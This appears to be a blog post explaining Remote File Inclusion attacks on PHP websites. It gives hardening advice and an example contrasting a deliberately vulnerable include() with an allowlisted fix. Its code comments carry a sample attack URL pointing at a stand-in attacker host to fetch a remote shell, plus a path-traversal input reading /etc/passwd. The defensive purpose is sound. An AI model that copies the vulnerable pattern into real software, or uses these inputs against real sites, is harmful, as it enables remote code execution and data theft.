An Awe-Inspiring Website Attack: RFI

RFI stands for Remote File Inclusion. We’ve seen some captured demos here and there, but this one is one of the most impressive yet. The example shown in the post Bots Galore! is worth reading – in fact, studying! Look how it ends, with a simple GUI for controlling your site. Chances are, there are eight or nine of these scripts floating around on underground file sharing networks right now.

Wikipedia gives an excellent description of the RFI attack. Briefly: a PHP page takes a file name from a parameter in the URL’s query string (the part after the ‘?’) and hands it straight to PHP’s “include” function. Guess what? With URL includes enabled, an attacker simply points that parameter at a file on a server he controls, and PHP fetches it and executes it as part of your page. No password cracking, no muss, no fuss, and little trace beyond one ordinary-looking GET request in your access log.

Guard against this! Turn off register_globals on your server if it isn’t off already (it was removed entirely in PHP 5.4), and set allow_url_include = Off so that include() cannot pull files over HTTP at all; if nothing on the site needs remote fopen either, turn off allow_url_fopen too. Above all, never build an include path out of user input. If you have several pages of code that have to link together, include each file specifically by name in the code itself, or map the URL parameter onto a fixed list of known files and reject anything else.
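To make the two halves of that advice concrete, here is the vulnerable pattern next to an allowlisted replacement, plus a quick check of the php.ini settings. This is an added example, not code from the original post or from the Bots Galore! demo; the page names and the pages/ directory are assumptions.

```php
<?php
// Added example (not from the original post). Page names and the pages/
// directory are assumptions for illustration.

// VULNERABLE: the query-string value goes straight into include().
// With allow_url_include=On, ?page=http://attacker.example/shell.txt makes
// PHP fetch and execute the attacker's file. Even with it off, this is a
// local file inclusion / path traversal hole (?page=../../etc/passwd).
function vulnerable_include(): void
{
    include $_GET['page'];
}

// HARDENED: map the untrusted parameter onto a fixed list of known files.
// Only exact keys are accepted; anything else falls back to a known page.
const PAGES = [
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

function resolve_page(?string $page): string
{
    return PAGES[$page] ?? PAGES['home'];
}

function hardened_include(): void
{
    include resolve_page($_GET['page'] ?? null);
}

// Runtime report of the settings the post tells you to turn off.
// register_globals no longer exists in PHP >= 5.4, so ini_get() returns false there.
function rfi_settings_report(): array
{
    return [
        'allow_url_include' => filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN),
        'allow_url_fopen'   => filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN),
        'register_globals'  => filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN),
    ];
}

// Example run: resolve a couple of inputs and print the ini report.
var_dump(resolve_page('about'));                          // the about page path
var_dump(resolve_page('http://attacker.example/shell'));   // falls back to home
var_dump(rfi_settings_report());
```

The corresponding php.ini lines are allow_url_include = Off, allow_url_fopen = Off and register_globals = Off. Note that the allowlist does the real work: even with URL includes disabled, an unfiltered include() still reads any local file the web server can open.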

Peter Brittain

This entry was posted in Website Hosting.
